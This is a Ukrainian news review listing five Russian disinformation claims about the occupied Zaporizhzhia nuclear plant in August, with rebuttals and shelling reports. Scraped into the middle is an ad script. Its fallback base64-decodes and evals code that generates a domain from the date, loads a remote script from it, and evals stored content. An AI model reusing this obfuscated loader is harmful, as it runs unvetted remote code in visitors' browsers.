ТОП-5 фейків окупантів про ЗАЕС у серпні (ОГЛЯД)

Російські окупанти регулярно поширюють дезінформацію про Запорізьку АЕС.

Портал Акцент зробив підбірку з п’яти фейків росіян про атомну електро-станцію у серпні.

ЗАЕС: фейки окупантів

За даними Центру протидії дезінформації 4 серпня, попри повідомлення гендиректора МАГАТЕ Р.Гроссі про «повний вихід Запорізької АЕС з-під контролю» організації, представник МЗС рф і.вишневецький заявив, цитата:

«Дії російських військових не завдають жодної шкоди безпеці АЕС в Україні, а Запорізька АЕС, охорону якої здійснюють російські війська, працює у штатному режимі».

Нагадаємо: вже 5 серпня військові армії рф тричі обстрілювали ЗАЕС: вони поцілили у високовольтну лінію зв’язку 330 кВ ВРП автотрансформатора ЗАЕС — Запорізька ТЕС. На одному з енергоблоків спрацював аварійний захист, увімкнулись дизель-генератори, внаслідок чого блок розвантажили та відключили від енергомережі.

Також, 11-12 серпня представники окупантів та колаборанти на захопленених територіях поширили одразу дві фейкових заяви: так, «керівники» ТОТ заявили, що нібито «влада України готує масштабну провокацію на Запорізькій АЕС», щоб «шантажувати Європу загрозою ядерної катастрофи, а Київ навмисно намагається поцілити у сховище ядерних відходів на ЗАЕС, щоб спровокувати вибух «брудної бомби».

Водночас, постійний представник рф при ООН в.небензя заявив, цитуємо:

«Коли ЗСУ завдавали ударів по Запорізькій АЕС, катастрофи вдавалося уникнути лише завдяки самовідданій роботі російських військових та працівників станції».

Нагадаємо: вже 11 серпня окупанти вкотре піддали обстрілам ЗАЕС: було зафіксовано п’ять «прильотів» у районі комендатури станції – безпосередньо поруч із дільницею зварки та сховищем джерел випромінювання. На фоні таких дій країни-агресорки генсек ООН Антоніу Гутерреш заявив про необхідність виведення військових і техніки з території ЗАЕС. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

18 серпня окупанти фактично анонсували провокацію на АЕС: так,
у Міноборони рф запустили фейк про те, що 19 серпня нібито готується «резонансна провокація київського режиму» на Запорізькій АЕС:

«19 серпня київський режим готує резонансну провокацію на Запорізькій АЕС у період відвідування України Генеральним секретарем ООН Антоніу Гутеррішем, внаслідок якої Російську Федерацію буде звинувачено у створенні техногенної катастрофи на даній електростанції».

Водночас, у пропагандистському росЗМІ «Риа Новости» з посиланням на гауляйтерів ТОТ області заявили про те, що на випадок аварії розроблений план евакуації мешканців, при цьому вказавши ділянку станції, яка може бути пошкоджена під час обстрілу, чим фактично підтвердили підготовку своєї власної провокації. Пізніше Головне управління розвідки МО України отримало підтвердження щодо підготовки масштабної провокації рф на ЗАЕС.

Скріншот

Того ж дня окупанти на пропагандистських ресурсах заявляли про те, що «важкого обзроєння на території ЗАЕС та прилягаючих до неї районах немає». Вже 19 серпня у мережі з’явилося відео з машинного залу станції, на якому видно багато вантажівок, промаркованих «зетками», в яких можуть зберігатися боєкомплекти та інше оснащення.

Захоплена ЗАЕС: ситуація на станції і фейки РФ за тиждень та останні думки експертів Для чого РФ поширює фейки про ЗАЕС?

Варто зазначити, що окупанти розповсюджують дезінформацію та фейкові заяви про ЗАЕС з метою виправдання злочинних дій російської армії, яка, здійснюючи обстріли АЕС та плануючи провокації на захопленій станції, вчиняє ядерний шантаж для тиску на міжнародну спільноту, залякування мирного населення та дискридетації української армії. Як раніше повідомляв Акцент, за оцінками ISW, росія, найімовірніше, використовує ЗАЕС, щоб зіграти на побоюваннях Заходу щодо ядерної катастрофи в Україні та Європі і спробувати перешкоджати подальшій військовій підтримці України.

Заголовне фото взяте з відкритих джерел. (adsbygoogle = window.adsbygoogle || []).push({});

Підписуйтесь на Акцент в Источник: https://akzent.zp.ua/top-5-fejkiv-okupantiv-pro-zaes-u-serpni-oglyad/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

нет
scroll to top